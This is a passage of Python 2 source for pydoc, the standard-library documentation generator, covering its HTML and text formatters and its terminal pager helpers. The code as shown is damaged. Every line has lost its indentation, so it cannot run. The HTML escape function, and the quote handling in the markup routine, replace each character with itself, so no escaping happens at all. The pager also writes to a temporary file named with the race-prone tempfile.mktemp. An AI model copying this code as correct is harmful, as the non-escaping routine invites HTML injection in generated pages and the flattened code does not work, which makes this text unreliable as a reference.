elif exc is ImportError and extract_tb(tb)[-1][2]=='safeimport':
# The import error occurred directly in this function,
# which means there is no such module in the path.
return None
else:
# Some other error occurred during the importing process.
raise ErrorDuringImport(path, sys.exc_info())
for part in split(path, '.')[1:]:
try: module = getattr(module, part)
except AttributeError: return None
return module
# ---------------------------------------------------- formatter base class
class Doc:
def document(self, object, name=None, *args):
"""Generate documentation for an object."""
args = (object, name) + args
# 'try' clause is to attempt to handle the possibility that inspect
# identifies something in a way that pydoc itself has issues handling;
# think 'super' and how it is a descriptor (which raises the exception
# by lacking a __name__ attribute) and an instance.
if inspect.isgetsetdescriptor(object): return self.docdata(*args)
if inspect.ismemberdescriptor(object): return self.docdata(*args)
try:
if inspect.ismodule(object): return self.docmodule(*args)
if inspect.isclass(object): return self.docclass(*args)
if inspect.isroutine(object): return self.docroutine(*args)
except AttributeError:
pass
if isinstance(object, property): return self.docproperty(*args)
return self.docother(*args)
def fail(self, object, name=None, *args):
"""Raise an exception for unimplemented types."""
message = "don't know how to document object%s of type %s" % (
name and ' ' + repr(name), type(object).__name__)
raise TypeError, message
docmodule = docclass = docroutine = docother = docproperty = docdata = fail
def getdocloc(self, object):
"""Return the location of module docs or None"""
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
docloc = os.environ.get("PYTHONDOCS",
"http://docs.python.org/library")
basedir = os.path.join(sys.exec_prefix, "lib",
"python"+sys.version[0:3])
if (isinstance(object, type(os)) and
(object.__name__ in ('errno', 'exceptions', 'gc', 'imp',
'marshal', 'posix', 'signal', 'sys',
'thread', 'zipimport') or
(file.startswith(basedir) and
not file.startswith(os.path.join(basedir, 'site-packages')))) and
object.__name__ not in ('xml.etree', 'test.pydoc_mod')):
if docloc.startswith("http://"):
docloc = "%s/%s" % (docloc.rstrip("/"), object.__name__)
else:
docloc = os.path.join(docloc, object.__name__ + ".html")
else:
docloc = None
return docloc
# -------------------------------------------- HTML documentation generator
class HTMLRepr(Repr):
"""Class for safely making an HTML representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def escape(self, text):
return replace(text, '&', '&', '<', '<', '>', '>')
def repr(self, object):
return Repr.repr(self, object)
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return self.escape(cram(stripid(repr(x)), self.maxother))
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + self.escape(test) + testrepr[0]
return re.sub(r'((\\[\\abfnrtv\'"]|\\[0-9]..|\\x..|\\u....)+)',
r'<font color="#c040c0">\1</font>',
self.escape(testrepr))
repr_str = repr_string
def repr_instance(self, x, level):
try:
return self.escape(cram(stripid(repr(x)), self.maxstring))
except:
return self.escape('<%s instance>' % x.__class__.__name__)
repr_unicode = repr_string
class HTMLDoc(Doc):
"""Formatter class for HTML documentation."""
# ------------------------------------------- HTML formatting utilities
_repr_instance = HTMLRepr()
repr = _repr_instance.repr
escape = _repr_instance.escape
def page(self, title, contents):
"""Format an HTML page."""
return '''
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Python: %s</title>
</head><body bgcolor="#f0f0f8">
%s
</body></html>''' % (title, contents)
def heading(self, title, fgcol, bgcol, extras=''):
"""Format a page heading."""
return '''
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="heading">
<tr bgcolor="%s">
<td valign=bottom> <br>
<font color="%s" face="helvetica, arial"> <br>%s</font></td
><td align=right valign=bottom
><font color="%s" face="helvetica, arial">%s</font></td></tr></table>
''' % (bgcol, fgcol, title, fgcol, extras or ' ')
def section(self, title, fgcol, bgcol, contents, width=6,
prelude='', marginalia=None, gap=' '):
"""Format a section with a heading."""
if marginalia is None:
marginalia = '<tt>' + ' ' * width + '</tt>'
result = '''<p>
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="%s">
<td colspan=3 valign=bottom> <br>
<font color="%s" face="helvetica, arial">%s</font></td></tr>
''' % (bgcol, fgcol, title)
if prelude:
result = result + '''
<tr bgcolor="%s"><td rowspan=2>%s</td>
<td colspan=2>%s</td></tr>
<tr><td>%s</td>''' % (bgcol, marginalia, prelude, gap)
else:
result = result + '''
<tr><td bgcolor="%s">%s</td><td>%s</td>''' % (bgcol, marginalia, gap)
return result + '\n<td width="100%%">%s</td></tr></table>' % contents
def bigsection(self, title, *args):
"""Format a section with a big heading."""
title = '<big><strong>%s</strong></big>' % title
return self.section(title, *args)
def preformat(self, text):
"""Format literal preformatted text."""
text = self.escape(expandtabs(text))
return replace(text, '\n\n', '\n \n', '\n\n', '\n \n',
' ', ' ', '\n', '<br>\n')
def multicolumn(self, list, format, cols=4):
"""Format a list of items into a multi-column list."""
result = ''
rows = (len(list)+cols-1)//cols
for col in range(cols):
result = result + '<td width="%d%%" valign=top>' % (100//cols)
for i in range(rows*col, rows*col+rows):
if i < len(list):
result = result + format(list[i]) + '<br>\n'
result = result + '</td>'
return '<table width="100%%" summary="list"><tr>%s</tr></table>' % result
def grey(self, text): return '<font color="#909090">%s</font>' % text
def namelink(self, name, *dicts):
"""Make a link for an identifier, given name-to-URL mappings."""
for dict in dicts:
if name in dict:
return '<a href="%s">%s</a>' % (dict[name], name)
return name
def classlink(self, object, modname):
"""Make a link for a class."""
name, module = object.__name__, sys.modules.get(object.__module__)
if hasattr(module, name) and getattr(module, name) is object:
return '<a href="%s.html#%s">%s</a>' % (
module.__name__, name, classname(object, modname))
return classname(object, modname)
def modulelink(self, object):
"""Make a link for a module."""
return '<a href="%s.html">%s</a>' % (object.__name__, object.__name__)
def modpkglink(self, data):
"""Make a link for a module or package to display in an index."""
name, path, ispackage, shadowed = data
if shadowed:
return self.grey(name)
if path:
url = '%s.%s.html' % (path, name)
else:
url = '%s.html' % name
if ispackage:
text = '<strong>%s</strong> (package)' % name
else:
text = name
return '<a href="%s">%s</a>' % (url, text)
def markup(self, text, escape=None, funcs={}, classes={}, methods={}):
"""Mark up some plain text, given a context of symbols to look for.
Each context dictionary maps object names to anchor names."""
escape = escape or self.escape
results = []
here = 0
pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|'
r'RFC[- ]?(\d+)|'
r'PEP[- ]?(\d+)|'
r'(self\.)?(\w+))')
while True:
match = pattern.search(text, here)
if not match: break
start, end = match.span()
results.append(escape(text[here:start]))
all, scheme, rfc, pep, selfdot, name = match.groups()
if scheme:
url = escape(all).replace('"', '"')
results.append('<a href="%s">%s</a>' % (url, url))
elif rfc:
url = 'http://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif pep:
url = 'http://www.python.org/dev/peps/pep-%04d/' % int(pep)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif text[end:end+1] == '(':
results.append(self.namelink(name, methods, funcs, classes))
elif selfdot:
results.append('self.<strong>%s</strong>' % name)
else:
results.append(self.namelink(name, classes))
here = end
results.append(escape(text[here:]))
return join(results, '')
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None):
"""Produce HTML for a class tree as given by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + '<dt><font face="helvetica, arial">'
result = result + self.classlink(c, modname)
if bases and bases != (parent,):
parents = []
for base in bases:
parents.append(self.classlink(base, modname))
result = result + '(' + join(parents, ', ') + ')'
result = result + '\n</font></dt>'
elif type(entry) is type([]):
result = result + '<dd>\n%s</dd>\n' % self.formattree(
entry, modname, c)
return '<dl>\n%s</dl>\n' % result
def docmodule(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a module object."""
name = object.__name__ # ignore the passed-in name
try:
all = object.__all__
except AttributeError:
all = None
parts = split(name, '.')
links = []
for i in range(len(parts)-1):
links.append(
'<a href="%s.html"><font color="#ffffff">%s</font></a>' %
(join(parts[:i+1], '.'), parts[i]))
linkedname = join(links + parts[-1:], '.')
head = '<big><big><strong>%s</strong></big></big>' % linkedname
try:
path = inspect.getabsfile(object)
url = path
if sys.platform == 'win32':
import nturl2path
url = nturl2path.pathname2url(path)
filelink = '<a href="file:%s">%s</a>' % (url, path)
except TypeError:
filelink = '(built-in)'
info = []
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
info.append('version %s' % self.escape(version))
if hasattr(object, '__date__'):
info.append(self.escape(str(object.__date__)))
if info:
head = head + ' (%s)' % join(info, ', ')
docloc = self.getdocloc(object)
if docloc is not None:
docloc = '<br><a href="%(docloc)s">Module Docs</a>' % locals()
else:
docloc = ''
result = self.heading(
head, '#ffffff', '#7799ee',
'<a href=".">index</a><br>' + filelink + docloc)
modules = inspect.getmembers(object, inspect.ismodule)
classes, cdict = [], {}
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
(inspect.getmodule(value) or object) is object):
if visiblename(key, all, object):
classes.append((key, value))
cdict[key] = cdict[value] = '#' + key
for key, value in classes:
for base in value.__bases__:
key, modname = base.__name__, base.__module__
module = sys.modules.get(modname)
if modname != name and module and hasattr(module, key):
if getattr(module, key) is base:
if not key in cdict:
cdict[key] = cdict[base] = modname + '.html#' + key
funcs, fdict = [], {}
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all, object):
funcs.append((key, value))
fdict[key] = '#-' + key
if inspect.isfunction(value): fdict[value] = fdict[key]
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all, object):
data.append((key, value))
doc = self.markup(getdoc(object), self.preformat, fdict, cdict)
doc = doc and '<tt>%s</tt>' % doc
result = result + '<p>%s</p>\n' % doc
if hasattr(object, '__path__'):
modpkgs = []
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs.append((modname, name, ispkg, 0))
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
result = result + self.bigsection(
'Package Contents', '#ffffff', '#aa55cc', contents)
elif modules:
contents = self.multicolumn(
modules, lambda key_value, s=self: s.modulelink(key_value[1]))
result = result + self.bigsection(
'Modules', '#ffffff', '#aa55cc', contents)
if classes:
classlist = map(lambda key_value: key_value[1], classes)
contents = [
self.formattree(inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Classes', '#ffffff', '#ee77aa', join(contents))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Functions', '#ffffff', '#eeaa77', join(contents))
if data:
contents = []
for key, value in data:
contents.append(self.document(value, key))
result = result + self.bigsection(
'Data', '#ffffff', '#55aa55', join(contents, '<br>\n'))
if hasattr(object, '__author__'):
contents = self.markup(str(object.__author__), self.preformat)
result = result + self.bigsection(
'Author', '#ffffff', '#7799ee', contents)
if hasattr(object, '__credits__'):
contents = self.markup(str(object.__credits__), self.preformat)
result = result + self.bigsection(
'Credits', '#ffffff', '#7799ee', contents)
return result
def docclass(self, object, name=None, mod=None, funcs={}, classes={},
*ignored):
"""Produce HTML documentation for a class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
contents = []
push = contents.append
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('<hr>\n')
self.needone = 1
hr = HorizontalRule()
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
hr.maybe()
push('<dl><dt>Method resolution order:</dt>\n')
for base in mro:
push('<dd>%s</dd>\n' % self.classlink(base,
object.__module__))
push('</dl>\n')
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
push(self._docdescriptor(name, value, mod))
else:
push(self.document(value, name, mod,
funcs, classes, mdict, object))
push('\n')
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
base = self.docother(getattr(object, name), name, mod)
if (hasattr(value, '__call__') or
inspect.isdatadescriptor(value)):
doc = getattr(value, "__doc__", None)
else:
doc = None
if doc is None:
push('<dl><dt>%s</dl>\n' % base)
else:
doc = self.markup(getdoc(value), self.preformat,
funcs, classes, mdict)
doc = '<dd><tt>%s</tt>' % doc
push('<dl><dt>%s%s</dl>\n' % (base, doc))
push('\n')
return attrs
attrs = filter(lambda data: visiblename(data[0], obj=object),
classify_class_attrs(object))
mdict = {}
for key, kind, homecls, value in attrs:
mdict[key] = anchor = '#' + name + '-' + key
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
pass
try:
# The value may not be hashable (e.g., a data attr with
# a dict or list value).
mdict[value] = anchor
except TypeError:
pass
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = 'defined here'
else:
tag = 'inherited from %s' % self.classlink(thisclass,
object.__module__)
tag += ':<br>\n'
# Sort attrs by name.
try:
attrs.sort(key=lambda t: t[0])
except TypeError:
attrs.sort(lambda t1, t2: cmp(t1[0], t2[0])) # 2.3 compat
# Pump out the attrs, segregated by kind.
attrs = spill('Methods %s' % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill('Class methods %s' % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill('Static methods %s' % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors('Data descriptors %s' % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata('Data and other attributes %s' % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = ''.join(contents)
if name == realname:
title = '<a name="%s">class <strong>%s</strong></a>' % (
name, realname)
else:
title = '<strong>%s</strong> = <a name="%s">class %s</a>' % (
name, name, realname)
if bases:
parents = []
for base in bases:
parents.append(self.classlink(base, object.__module__))
title = title + '(%s)' % join(parents, ', ')
doc = self.markup(getdoc(object), self.preformat, funcs, classes, mdict)
doc = doc and '<tt>%s<br> </tt>' % doc
return self.section(title, '#000000', '#ffc8d8', contents, 3, doc)
def formatvalue(self, object):
"""Format an argument default value as text."""
return self.grey('=' + self.repr(object))
def docroutine(self, object, name=None, mod=None,
funcs={}, classes={}, methods={}, cl=None):
"""Produce HTML documentation for a function or method object."""
realname = object.__name__
name = name or realname
anchor = (cl and cl.__name__ or '') + '-' + name
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + self.classlink(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % self.classlink(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % self.classlink(imclass,mod)
object = object.im_func
if name == realname:
title = '<a name="%s"><strong>%s</strong></a>' % (anchor, realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
reallink = '<a href="#%s">%s</a>' % (
cl.__name__ + '-' + realname, realname)
skipdocs = 1
else:
reallink = realname
title = '<a name="%s"><strong>%s</strong></a> = %s' % (
anchor, name, reallink)
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = '<strong>%s</strong> <em>lambda</em> ' % name
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + (note and self.grey(
'<font face="helvetica, arial">%s</font>' % note))
if skipdocs:
return '<dl><dt>%s</dt></dl>\n' % decl
else:
doc = self.markup(
getdoc(object), self.preformat, funcs, classes, methods)
doc = doc and '<dd><tt>%s</tt></dd>' % doc
return '<dl><dt>%s</dt>%s</dl>\n' % (decl, doc)
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push('<dl><dt><strong>%s</strong></dt>\n' % name)
if value.__doc__ is not None:
doc = self.markup(getdoc(value), self.preformat)
push('<dd><tt>%s</tt></dd>\n' % doc)
push('</dl>\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a property."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a data object."""
lhs = name and '<strong>%s</strong> = ' % name or ''
return lhs + self.repr(object)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def index(self, dir, shadowed=None):
"""Generate an HTML index for a directory of modules."""
modpkgs = []
if shadowed is None: shadowed = {}
for importer, name, ispkg in pkgutil.iter_modules([dir]):
modpkgs.append((name, '', ispkg, name in shadowed))
shadowed[name] = 1
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
return self.bigsection(dir, '#ffffff', '#ee77aa', contents)
# -------------------------------------------- text documentation generator
class TextRepr(Repr):
"""Class for safely making a text representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return cram(stripid(repr(x)), self.maxother)
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + test + testrepr[0]
return testrepr
repr_str = repr_string
def repr_instance(self, x, level):
try:
return cram(stripid(repr(x)), self.maxstring)
except:
return '<%s instance>' % x.__class__.__name__
class TextDoc(Doc):
"""Formatter class for text documentation."""
# ------------------------------------------- text formatting utilities
_repr_instance = TextRepr()
repr = _repr_instance.repr
def bold(self, text):
"""Format a string in bold by overstriking."""
return join(map(lambda ch: ch + '\b' + ch, text), '')
def indent(self, text, prefix=' '):
"""Indent text by prepending a given prefix to each line."""
if not text: return ''
lines = split(text, '\n')
lines = map(lambda line, prefix=prefix: prefix + line, lines)
if lines: lines[-1] = rstrip(lines[-1])
return join(lines, '\n')
def section(self, title, contents):
"""Format a section with a given heading."""
return self.bold(title) + '\n' + rstrip(self.indent(contents)) + '\n\n'
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None, prefix=''):
"""Render in text a class tree as returned by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + prefix + classname(c, modname)
if bases and bases != (parent,):
parents = map(lambda c, m=modname: classname(c, m), bases)
result = result + '(%s)' % join(parents, ', ')
result = result + '\n'
elif type(entry) is type([]):
result = result + self.formattree(
entry, modname, c, prefix + ' ')
return result
def docmodule(self, object, name=None, mod=None):
"""Produce text documentation for a given module object."""
name = object.__name__ # ignore the passed-in name
synop, desc = splitdoc(getdoc(object))
result = self.section('NAME', name + (synop and ' - ' + synop))
try:
all = object.__all__
except AttributeError:
all = None
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
result = result + self.section('FILE', file)
docloc = self.getdocloc(object)
if docloc is not None:
result = result + self.section('MODULE DOCS', docloc)
if desc:
result = result + self.section('DESCRIPTION', desc)
classes = []
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None
or (inspect.getmodule(value) or object) is object):
if visiblename(key, all, object):
classes.append((key, value))
funcs = []
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all, object):
funcs.append((key, value))
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all, object):
data.append((key, value))
modpkgs = []
modpkgs_names = set()
if hasattr(object, '__path__'):
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs_names.add(modname)
if ispkg:
modpkgs.append(modname + ' (package)')
else:
modpkgs.append(modname)
modpkgs.sort()
result = result + self.section(
'PACKAGE CONTENTS', join(modpkgs, '\n'))
# Detect submodules as sometimes created by C extensions
submodules = []
for key, value in inspect.getmembers(object, inspect.ismodule):
if value.__name__.startswith(name + '.') and key not in modpkgs_names:
submodules.append(key)
if submodules:
submodules.sort()
result = result + self.section(
'SUBMODULES', join(submodules, '\n'))
if classes:
classlist = map(lambda key_value: key_value[1], classes)
contents = [self.formattree(
inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name))
result = result + self.section('CLASSES', join(contents, '\n'))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name))
result = result + self.section('FUNCTIONS', join(contents, '\n'))
if data:
contents = []
for key, value in data:
contents.append(self.docother(value, key, name, maxlen=70))
result = result + self.section('DATA', join(contents, '\n'))
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
result = result + self.section('VERSION', version)
if hasattr(object, '__date__'):
result = result + self.section('DATE', str(object.__date__))
if hasattr(object, '__author__'):
result = result + self.section('AUTHOR', str(object.__author__))
if hasattr(object, '__credits__'):
result = result + self.section('CREDITS', str(object.__credits__))
return result
def docclass(self, object, name=None, mod=None, *ignored):
"""Produce text documentation for a given class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
def makename(c, m=object.__module__):
return classname(c, m)
if name == realname:
title = 'class ' + self.bold(realname)
else:
title = self.bold(name) + ' = class ' + realname
if bases:
parents = map(makename, bases)
title = title + '(%s)' % join(parents, ', ')
doc = getdoc(object)
contents = doc and [doc + '\n'] or []
push = contents.append
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
push("Method resolution order:")
for base in mro:
push(' ' + makename(base))
push('')
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('-' * 70)
self.needone = 1
hr = HorizontalRule()
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
push(self._docdescriptor(name, value, mod))
else:
push(self.document(value,
name, mod, object))
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
if (hasattr(value, '__call__') or
inspect.isdatadescriptor(value)):
doc = getdoc(value)
else:
doc = None
push(self.docother(getattr(object, name),
name, mod, maxlen=70, doc=doc) + '\n')
return attrs
attrs = filter(lambda data: visiblename(data[0], obj=object),
classify_class_attrs(object))
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = "defined here"
else:
tag = "inherited from %s" % classname(thisclass,
object.__module__)
# Sort attrs by name.
attrs.sort()
# Pump out the attrs, segregated by kind.
attrs = spill("Methods %s:\n" % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill("Class methods %s:\n" % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill("Static methods %s:\n" % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors("Data descriptors %s:\n" % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata("Data and other attributes %s:\n" % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = '\n'.join(contents)
if not contents:
return title + '\n'
return title + '\n' + self.indent(rstrip(contents), ' | ') + '\n'
def formatvalue(self, object):
"""Format an argument default value as text."""
return '=' + self.repr(object)
def docroutine(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a function or method object."""
realname = object.__name__
name = name or realname
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + classname(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % classname(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % classname(imclass,mod)
object = object.im_func
if name == realname:
title = self.bold(realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
skipdocs = 1
title = self.bold(name) + ' = ' + realname
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = self.bold(name) + ' lambda '
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + note
if skipdocs:
return decl + '\n'
else:
doc = getdoc(object) or ''
return decl + '\n' + (doc and rstrip(self.indent(doc)) + '\n')
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push(self.bold(name))
push('\n')
doc = getdoc(value) or ''
if doc:
push(self.indent(doc))
push('\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a property."""
return self._docdescriptor(name, object, mod)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, parent=None, maxlen=None, doc=None):
"""Produce text documentation for a data object."""
repr = self.repr(object)
if maxlen:
line = (name and name + ' = ' or '') + repr
chop = maxlen - len(line)
if chop < 0: repr = repr[:chop] + '...'
line = (name and self.bold(name) + ' = ' or '') + repr
if doc is not None:
line += '\n' + self.indent(str(doc))
return line
# --------------------------------------------------------- user interfaces
def pager(text):
"""The first time this is called, determine what kind of pager to use."""
global pager
pager = getpager()
pager(text)
def getpager():
"""Decide what method to use for paging through text."""
if type(sys.stdout) is not types.FileType:
return plainpager
if not sys.stdin.isatty() or not sys.stdout.isatty():
return plainpager
if 'PAGER' in os.environ:
if sys.platform == 'win32': # pipes completely broken in Windows
return lambda text: tempfilepager(plain(text), os.environ['PAGER'])
elif os.environ.get('TERM') in ('dumb', 'emacs'):
return lambda text: pipepager(plain(text), os.environ['PAGER'])
else:
return lambda text: pipepager(text, os.environ['PAGER'])
if os.environ.get('TERM') in ('dumb', 'emacs'):
return plainpager
if sys.platform == 'win32' or sys.platform.startswith('os2'):
return lambda text: tempfilepager(plain(text), 'more <')
if hasattr(os, 'system') and os.system('(less) 2>/dev/null') == 0:
return lambda text: pipepager(text, 'less')
import tempfile
(fd, filename) = tempfile.mkstemp()
os.close(fd)
try:
if hasattr(os, 'system') and os.system('more "%s"' % filename) == 0:
return lambda text: pipepager(text, 'more')
else:
return ttypager
finally:
os.unlink(filename)
def plain(text):
"""Remove boldface formatting from text."""
return re.sub('.\b', '', text)
def pipepager(text, cmd):
"""Page through text by feeding it to another program."""
pipe = os.popen(cmd, 'w')
try:
pipe.write(text)
pipe.close()
except IOError:
pass # Ignore broken pipes caused by quitting the pager program.
def tempfilepager(text, cmd):
"""Page through text by invoking a program on a temporary file."""
import tempfile
filename = tempfile.mktemp()
file = open(filename, 'w')
file.write(text)
file.close()
try:
os.system(cmd + ' "' + filename + '"')
finally:
os.unlink(filename)
def ttypager(text):
"""Page through text on a text terminal."""
lines = split(plain(text), '\n')
try:
import tty
fd = sys.stdin.fileno()
old = tty.tcgetattr(fd)
tty.setcbreak(fd)
getchar = lambda: sys.stdin.read(1)
except (ImportError, AttributeError):
tty = None
getchar = lambda: sys.stdin.readline()[:-1][:1]
try:
r = inc = os.environ.get('LINES', 25) - 1
sys.stdout.write(join(lines[:inc], '\n') + '\n')
while lines[r:]:
sys.stdout.write('-- more --')
sys.stdout.flush()
c = getchar()
if c in ('q', 'Q'):
sys.stdout.write('\r \r')
break
elif c in ('\r', '\n'):
sys.stdout.write('\r \r' + lines[r] + '\n')
r = r + 1
continue
if c in ('b', 'B', '\x1b'):
r = r - inc - inc
if r < 0: r = 0
sys.stdout.write('\n' + join(lines[r:r+inc], '\n') + '\n')
r = r + inc
finally:
if tty:
tty.tcsetattr(fd, tty.TCSAFLUSH, old)
def plainpager(text):
"""Simply print unformatted text. This is the ultimate fallback."""
sys.stdout.write(plain(text))
def describe(thing):
"""Produce a short description of the given thing."""
if inspect.ismodule(thing):
if thing.__name__ in sys.builtin_module_names:
return 'built-in module ' + thing.__name__
if hasattr(thing, '__path__'):
return 'package ' + thing.__name__
else:
return 'module ' + thing.__name__
if inspect.isbuiltin(thing):
return 'built-in function ' + thing.__name__
if inspect.isgetsetdescriptor(thing):
return 'getset descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.ismemberdescriptor(thing):
return 'member descriptor %s.%s.%s' % (
